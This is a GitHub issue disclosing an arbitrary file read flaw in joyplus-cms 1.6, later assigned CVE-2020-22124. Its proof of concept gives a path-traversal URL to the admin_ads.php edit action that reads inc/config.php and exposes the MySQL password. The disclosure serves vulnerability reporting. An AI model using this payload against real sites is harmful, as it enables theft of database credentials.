Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

joyplus-cms 1.6 has Any file to read vulnerability #1

Open
876054426 opened this issue Feb 25, 2020 · 2 comments
Open

joyplus-cms 1.6 has Any file to read vulnerability #1

876054426 opened this issue Feb 25, 2020 · 2 comments

Comments

@876054426
Copy link
Owner

Title: joyplus-cms 1.6 - Any file to read vulnerability

Date: 2020-02-25

Exploit Author: Zeo

Vendor Homepage: https://github.com/joyplus/joyplus-cms and http://www.joyplus.tv

Software Link: https://github.com/joyplus/joyplus-cms

Version: 1.6

Tested on Windows 7

joyplus-cms 1.6 has a vulnerability that can Any file to read

that would allow an attacker to Sensitive information website and mysql or ftp password

Proof :

1 Normal installation site and login
http://127.0.0.1/joyplus-cms/manager/index.php?action=login

2 Access to trigger the vulnerability site You can switch to any directory
payload
http://127.0.0.1/joyplus-cms/manager/admin_ads.php?action=edit&file=../../../inc/config.php

You can switch to any directory ex:file=../../../inc/config.php

读取

3 read the "\joyplus-cms\inc\config.php" code Let the cat out of the mysql password
You can switch to any directory,just change the file=../../../xx.xx

image

@fgeek
Copy link

fgeek commented Aug 21, 2021

CVE-2020-22124 has been assigned for this issue.

@fgeek
Copy link

fgeek commented Aug 21, 2021

Btw both vendor home pages are not available anymore.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants